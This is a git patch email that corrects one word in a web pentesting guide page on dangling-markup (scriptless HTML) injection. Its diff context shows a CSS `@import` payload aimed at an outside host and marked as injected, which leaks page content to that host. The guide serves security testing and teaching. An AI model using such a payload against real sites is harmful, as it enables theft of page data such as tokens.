From 84f56735dfba465da3e74bfcd5e81bb8ecffb878 Mon Sep 17 00:00:00 2001 From: Rishu Ranjan <51092706+rishuranjanofficial@users.noreply.github.com> Date: Thu, 23 Sep 2021 15:20:01 +0530 Subject: [PATCH] Update in content Line should be You can also abuse CSS @import (will send all the code until it find a ";") not colon --- pentesting-web/dangling-markup-html-scriptless-injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pentesting-web/dangling-markup-html-scriptless-injection.md b/pentesting-web/dangling-markup-html-scriptless-injection.md index f6de5a20b35..51c57de02bb 100644 --- a/pentesting-web/dangling-markup-html-scriptless-injection.md +++ b/pentesting-web/dangling-markup-html-scriptless-injection.md @@ -23,7 +23,7 @@ If the `img` tag is forbidden \(due to CSP for example\) you can also use `@import//hackvertor.co.uk? <--- Injected